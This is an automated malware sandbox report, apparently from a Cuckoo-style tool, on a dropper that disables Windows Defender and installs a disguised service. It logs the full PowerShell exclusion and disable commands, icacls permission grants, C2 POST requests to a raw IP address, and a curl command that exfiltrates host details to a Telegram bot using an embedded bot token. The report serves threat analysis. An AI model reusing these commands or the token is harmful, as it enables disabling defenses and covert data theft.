Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Aug. 5, 2024, 10:35 a.m. | Aug. 5, 2024, 10:46 a.m. |
Process | Command line | PID |
---|---|---|
powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true | 2060 |
powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\ | 2232 |
1.exe | "C:\programdata\1.exe" /D | 2376 |
chcp.com | chcp 65001 | 2600 |
powershell.exe | powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\ | 2672 |
tasklist.exe | tasklist /FI "IMAGENAME eq Superfetch.exe" | 2768 |
find.exe | find /I /N "Superfetch.exe" | 2804 |
takeown.exe | takeown /f c:\windows\tasks | 2952 |
timeout.exe | TIMEOUT /T 3 /NOBREAK | 2996 |
icacls.exe | icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" | 2236 |
icacls.exe | icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)" | 2436 |
icacls.exe | icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)" | 2512 |
icacls.exe | icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)" | 2484 |
icacls.exe | icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)" | 2620 |
icacls.exe | icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)" | 2696 |
icacls.exe | icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)" | 2720 |
timeout.exe | TIMEOUT /T 3 /NOBREAK | 2828 |
timeout.exe | TIMEOUT /T 1 /NOBREAK | 2280 |
Wmiic.exe | "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe | 2900 |
timeout.exe | TIMEOUT /T 1 /NOBREAK | 2764 |
Wmiic.exe | "C:\windows\tasks\wmiic" start WMService | 2852 |
timeout.exe | TIMEOUT /T 2 /NOBREAK | 2340 |
net1.exe | C:\Windows\system32\net1 start WMService | 2568 |
WMIC.exe | WMIC CPU Get Name /Value | 2532 |
findstr.exe | FindStr . | 2616 |
cmd.exe | C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value\| FIND.EXE "=" | 2740 |
tasklist.exe | tasklist /FI "IMAGENAME eq Superfetch.exe" | 2784 |
find.exe | find /I /N "Superfetch.exe" | 1676 |
curl.exe | c:\programdata\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="TEST22-PCCORE2Intel(R) Core(TM) i5-8400 CPU @ 2.80GHzIntel(R) Core(TM) i5-8400 CPU @ 2.80GHzSERVICE WMService NOT RUN" "https://api.telegram.org/bot"5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"/sendMessage" | 2104 |
Name | Response | Post-Analysis Lookup |
---|---|---|
api.telegram.org | 149.154.167.220 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.3 192.168.56.103:49216 149.154.167.220:443 | None | None | None |
pdb_path | D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb |
section | .gfids |
resource name | PNG |
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://185.213.208.196:8080/client/setClientConfig?clientId=test22-PC |
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://185.213.208.196:8080/client/setClientStatus?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientConfig?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientStatus?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientConfig?clientId=test22-PC |
request | POST http://185.213.208.196:8080/client/setClientStatus?clientId=test22-PC |
file | C:\ProgramData\migrate.exe |
file | C:\Windows\Tasks\run.bat |
file | C:\Windows\Tasks\MSTask.exe |
file | C:\Windows\Tasks\IntelConfigService.exe |
file | C:\ProgramData\curl.exe |
file | C:\ProgramData\1.exe |
file | C:\Windows\Tasks\Wrap.exe |
file | C:\ProgramData\st.bat |
file | C:\Windows\Tasks\Superfetch.exe |
file | C:\Windows\Tasks\ApplicationsFrameHost.exe |
file | C:\ProgramData\ru.bat |
file | C:\Windows\Tasks\Wmiic.exe |
file | C:\ProgramData\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "=" |
cmdline | powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\ |
cmdline | C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr . |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\ |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true |
cmdline | powershell Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\ |
cmdline | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
cmdline | WMIC CPU Get Name /Value |
cmdline | WMIC /Node:localhost Path Win32_VideoController Get Name /Value |
cmdline | C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat" |
file | C:\Windows\Tasks\Wmiic.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SUPERFETCH.EXE' |
wmi | SELECT Name FROM Win32_VideoController |
wmi | SELECT Name FROM WIN32_PROCESSOR |
section | {u'size_of_data': u'0x0000e200', u'virtual_address': u'0x00062000', u'entropy': 6.803785215984442, u'name': u'.rsrc', u'virtual_size': u'0x0000e020'} | entropy | 6.80378521598 | description | A section with a high entropy has been found |
process | 1.exe |
description | Create a windows service | rule | Create_Service |
description | Communications over RAW Socket | rule | Network_TCP_Socket |
description | Communication using DGA | rule | Network_DGA |
description | Match Windows Http API call | rule | Str_Win32_Http_API |
description | Take ScreenShot | rule | ScreenShot |
description | Escalate priviledges | rule | Escalate_priviledges |
description | Steal credential | rule | local_credential_Steal |
description | PWS Memory | rule | Generic_PWS_Memory_Zero |
description | Record Audio | rule | Sniff_Audio |
description | Communications over HTTP | rule | Network_HTTP |
description | Communications use DNS | rule | Network_DNS |
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerCheck__RemoteAPI |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | DebuggerException__ConsoleCtrl |
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | (no description) | rule | Check_Dlls |
description | Checks if being debugged | rule | anti_dbg |
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert |
description | Bypass DEP | rule | disable_dep |
description | Affect hook table | rule | win_hook |
description | File Downloader | rule | Network_Downloader |
description | Match Windows Inet API call | rule | Str_Win32_Internet_API |
description | Communications over FTP | rule | Network_FTP |
description | Run a KeyLogger | rule | KeyLogger |
description | Communications over P2P network | rule | Network_P2P_Win |
description | Create a windows service | rule | Create_Service |
description | Communications over RAW Socket | rule | Network_TCP_Socket |
description | Communication using DGA | rule | Network_DGA |
description | Match Windows Http API call | rule | Str_Win32_Http_API |
description | Take ScreenShot | rule | ScreenShot |
description | Escalate priviledges | rule | Escalate_priviledges |
description | Steal credential | rule | local_credential_Steal |
description | PWS Memory | rule | Generic_PWS_Memory_Zero |
description | Record Audio | rule | Sniff_Audio |
description | Communications over HTTP | rule | Network_HTTP |
description | Communications use DNS | rule | Network_DNS |
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerCheck__RemoteAPI |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | DebuggerException__ConsoleCtrl |
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
cmdline | tasklist /FI "IMAGENAME eq Superfetch.exe" |
cmdline | chcp 65001 |
cmdline | C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "=" |
cmdline | net start WMService |
cmdline | C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr . |
cmdline | WMIC CPU Get Name /Value |
cmdline | WMIC /Node:localhost Path Win32_VideoController Get Name /Value |
wmi | SELECT Name FROM WIN32_PROCESSOR |
host | 185.213.208.196 |
service_name | WMService | service_path | C:\Windows\Tasks\Wmiic.exe |
file | C:\Windows\Tasks\run.bat |
file | C:\Windows\Tasks\WinRing0x64.sys |
file | C:\Windows\Tasks\MSTask.exe |
file | C:\Windows\Tasks\config.json |
file | C:\Windows\Tasks\IntelConfigService.exe |
file | C:\Windows\Tasks\Wrap.exe |
file | C:\Windows\Tasks\Superfetch.exe |
file | C:\Windows\Tasks\ApplicationsFrameHost.exe |
file | C:\Windows\Tasks\Wmiic.exe |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)" |
cmdline | icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)" |
service | WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start) |
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware |
description | attempts to disable windows defender | registry | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start |
Engine | Detection |
---|---|
Bkav | W32.AIDetectMalware |
Lionic | Trojan.Win32.DefenderControl.a!c |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
CAT-QuickHeal | Trojan.Multi |
Skyhigh | BehavesLike.Win32.Generic.tc |
ALYac | Trojan.GenericKD.65288535 |
Cylance | Unsafe |
VIPRE | Trojan.Uztuby.36 |
Sangfor | Hacktool.Win32.Defendercontrol.V8yj |
K7AntiVirus | Riskware ( 0040eff71 ) |
BitDefender | Trojan.Uztuby.36 |
K7GW | Riskware ( 0040eff71 ) |
Cybereason | malicious.2e2853 |
Arcabit | Trojan.Uztuby.36 [many] |
Symantec | Trojan.Gen.MBT |
ESET-NOD32 | multiple detections |
McAfee | Artemis!53540062E285 |
Avast | Win32:Malware-gen |
ClamAV | Win.Trojan.DarkKomet-10027799-0 |
Kaspersky | HEUR:Trojan-Downloader.BAT.Agent.gen |
Alibaba | TrojanDownloader:Win32/DefenderDisabler.a8c972c6 |
MicroWorld-eScan | Trojan.Uztuby.36 |
Rising | HackTool.Defendercontrol!8.11556 (CLOUD) |
Emsisoft | Trojan.Uztuby.36 (B) |
DrWeb | Trojan.MulDrop20.62369 |
TrendMicro | HackTool.Win32.DefenderControl.AA |
McAfeeD | ti!6A1C8FE3F496 |
FireEye | Generic.mg.53540062e2853766 |
Sophos | Mal/Generic-S |
Ikarus | Trojan.Rasftuby |
Antiy-AVL | HackTool/Win32.DefenderControl |
Kingsoft | Win32.Troj.Unknown.a |
Gridinsoft | Trojan.Win32.Downloader.mz!s5 |
Xcitium | ApplicUnwnt@#1y78js06n91ja |
Microsoft | HackTool:Win32/Defendercontrol.A |
ZoneAlarm | HEUR:Trojan-Downloader.BAT.Agent.gen |
GData | Trojan.Uztuby.36 |
Varist | W32/DefControl.PCBH-4448 |
DeepInstinct | MALICIOUS |
VBA32 | Trojan.Zpevdo |
Malwarebytes | Generic.Malware.AI.DDS |
Panda | Trj/CI.A |
TrendMicro-HouseCall | HackTool.Win32.DefenderControl.AA |
Tencent | Bat.Trojan-Downloader.Agent.Bkjl |
Yandex | Trojan.Igent.bUUdXO.40 |
MAX | malware (ai score=80) |
MaxSecure | Trojan.Malware.121218.susgen |
Fortinet | Riskware/DefenderControl |
AVG | Win32:Malware-gen |